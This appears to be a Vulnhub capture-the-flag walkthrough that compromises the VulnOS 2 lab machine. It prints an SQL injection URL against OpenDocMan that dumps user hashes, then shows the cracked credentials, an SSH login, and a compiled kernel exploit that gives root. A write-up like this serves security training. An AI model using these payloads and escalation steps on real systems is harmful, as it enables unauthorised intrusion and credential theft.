Vulnhub VulnOS 2 walkthrough| sql injection in url
VulnOS: 2 is a boot to root virtual machine which is hosted on Vulnhub.
root@kali:~#nmap -p- 10.0.0.127
Nmap scan report for 10.0.0.127
Host is up (0.00015s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
6667/tcp open irc
MAC Address: 08:00:27:AD:6B:C2 (Oracle VirtualBox virtual NIC)
Identify services and version running on VulnOS
root@kali:~/Documents/vulnhub/vulnOS#nmap -sVC -vv -p- 10.0.0.127
Nmap scan report for 10.0.0.127
Host is up, received arp-response (0.00022s latency).
Scanned at 2020–01–15 21:54:19 IST for 20s
Not shown: 65532 closed ports
Reason: 65532 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAORRAsDcJJtkwMruX4yXojqiox8ni/JHNX/zgwtmPcfLkENKY5bYD1dMpASvE0K9Gh5Mo4U/yycRK9xHGLMssBBr5F8QOq8I66Ee7kOG+CJzT+g5Fhl+0R5pI2+kEGSipf+mL1A1HA9JYm87rNWkG3mI5cS4J2okX2CMZGPYucflAAAAFQCdR4coK0rgndw4wMd7SCCewTd5QQAAAIBGnb2CKZQhnmy7G/Dublt921HOMTOb3jXJugIp/Q0g9sQEkYQoEEXOS5+kDVODt7C1rgZQzvY4eX2gnEcW38esIIYVX5j54bV7RpcYTs+3onSvpLJJJudFOF8jS/J53DeiQ9sS68bCDi1K7h7f5dLeaemKJz8j42/8mdUpEZ+xHAAAAIBXyrkDziSMSuaCSxkfwFMzlqFWNI5EszgByhcHsuNYhrRryrZkC/Jq7ypWv2vt1zlkem9z/l5eX7gxwhckbQgPHqKxtmfznzoosQ0EoHAnG+bO7VXDM1yFl5xCXBLFvFlE6QjYJBcrtz9jeAJHUlyXAYIrSthz6y4OCc0rGAxC+g==
| 2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDpuBQNKY6U8FF+8yJgjCqn0f9MJ1rCgGLo2HdvhWvbgyOxmvf4mg47Oi4OWjpD7oiiaawPLFJfUPhBl7CVLLnMQxM6MDdmJP1qSl6slA52KB9Qt8hvPiatY9yF2UzTQ+riP9g2n6D9QQruSVQQFsKUeJvte2X7EApMmmXSQ1L/Qziio1mFu4tvqckMsfdjlYnFSRSdKoorT/7/Vw0sBUzDNsSsGq8tA3rqGOKmj3JdS0H0FGEciLFyIx9/rLC2bHc03l2V08Y8MozB3TQTcO6lvxpFgSAEPmNglCAMSZOIFmdIvpmi5FfHsVuP6O94twetVHq0CyvihY8SoXQoiqib
| 256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMTthIC3/w1NQVyFFPrMh63/cVUWJylryc7v9Whbab9DKivYIWxffvI6HJpjeMm63ChJV9HjkbtGBbKhnNeRJ64=
| 256 71:bc:6b:7b:56:02:a4:8e:ce:1c:8e:a6:1e:3a:37:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMx/VEravl9aUxne0KuM0Eexc8iu9sMLlyKfDQJ7XIn4
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open irc syn-ack ttl 64 ngircd
MAC Address: 08:00:27:AD:6B:C2 (Oracle VirtualBox virtual NIC)
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 15 21:54:39 2020–1 IP address (1 host up) scanned in 21.16 seconds
Port 80 — Enumerating http Apache httpd 2.4.7 ((Ubuntu))
open 10.0.0.127 in web browser
Lets follow along the hyperlink on the page. We are presented with another website.
The documentation tab gives away some information about a new site and its credentials.
click on home
then see in url something like http://10.0.0.127/jabc/?q=node/1 normally change value 1,2,3,4,5,6,7 and http://10.0.0.127/jabc/?q=node/7 when change value 1 to 7
then open documantation and in screen show none then open source code like something
<p><span style="color:#000000">For security reasons, this section is hidden.</span></p>
<p><span style="color:#000000">For a detailed view and documentation of our products, please visit our documentation platform at on the server. Just login with guest/guest</span></p>
<p><span style="color:#000000">Thank you.</span></p>
and found new directory /jabcd0cs/
open 10.0.0.127/jabcd0cs/
and see a login page i’m login with guest/guest and uploading php reverse shell but not upload
then logut from guest
and now im trying sql injection in login page
the found an error
and now i’m searching OpenDocMan v1.2.7 exploit
The exploit states that odm_user parameter is vulnerable to SQL injection.
then in url
http://10.0.0.127/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9 from information_schema.columns
the enumerate username and password from odm_user
webmin:b78aae356709f8c31118ea613980954b
guest:084e0343a0486ff05530df6c705c8bb4
then crack the hash use crackstation
webmin:b78aae356709f8c31118ea613980954b:webmin1980
guest:084e0343a0486ff05530df6c705c8bb4:guest
and login with ssh using user webmin and password webmin1980
and now got the shell convert proper shell using command
webmin@VulnOSv2:~$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)
Privilege Escalation
and search opendocman directory structure and where oopendocman store config files
after some enumeration we found config.php
webmin@VulnOSv2:/var/www/html/jabcd0cs$ cat config.php
and found mysql user root passwd toor
and try mysql root password as system root password then authentication failure
webmin@VulnOSv2:/var/www/html/jabcd0cs$ su root
Password:
su: Authentication failure
webmin@VulnOSv2:/var/www/html/jabcd0cs$
then try sudo -l
webmin@VulnOSv2:/var/www/html/jabcd0cs$ sudo -l
[sudo] password for webmin:
Sorry, user webmin may not run sudo on VulnOSv2.
webmin@VulnOSv2:/var/www/html/jabcd0cs$
then try
webmin@VulnOSv2:/var/www/html/jabcd0cs$ uname -a
Linux VulnOSv2 3.13.0–24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux
and searchexploit 2 3.13.0–24-generic #47-Ubuntu
root@kali:~/Documents/vulnhub/vulnOS# searchsploit ubuntu
Linux Kernel 2.13.0 < 3.19 (Ubun | exploits/linux/local/37292.c
compile exploit using gcc
webmin@VulnOSv2:/tmp$ gcc 37292.c -o ofs
and run exploit
webmin@VulnOSv2:/tmp$ ls
37292.c ofs vulnoskernal
webmin@VulnOSv2:/tmp$ ./ofs
webmin@VulnOSv2:/tmp$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)
then
# cd /root
# ls
flag.txt
# cat flag.txt
Hello and welcome.
You successfully compromised the company “JABC” and the server completely !!
Congratulations !!!
Hope you enjoyed it.
What do you think of A.I.?
enjoy your hacking